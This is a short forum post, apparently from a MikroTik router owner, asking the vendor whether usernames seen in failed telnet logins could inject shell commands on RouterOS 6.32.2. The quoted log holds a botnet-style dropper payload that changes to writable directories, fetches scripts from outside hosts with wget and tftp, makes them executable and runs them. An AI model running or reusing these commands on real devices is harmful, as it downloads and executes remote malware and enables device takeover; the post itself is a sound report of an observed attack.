we just saw this in one of our routers' logs:
Looks like someone's trying to inject malicious code via username. I wouldn't get excited, but the fact that the beginning of the second message looks truncated hints that the injection could actually work. If it was checked in wrongly quoted bash, well, we'd be seriously fucked up.
Code: Select all
system,error,critical login failure for user cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://188.8.131.52/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 208 from 184.108.40.206 via telnet system,error,critical login failure for user .67.1.91 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 220.127.116.11; chmod 777 tftp2.sh; sh tftp2.sh; rm from 18.104.22.168 via telnet
Could anyone from Mikrotik please reliably investigate/acknowledge/deny the possibility of this type of code injection? Version is quite recent (6.32.2). If the injection wasn't be possible, I highly doubt the scriptkids would even care to send such logins....
Thanks in advance,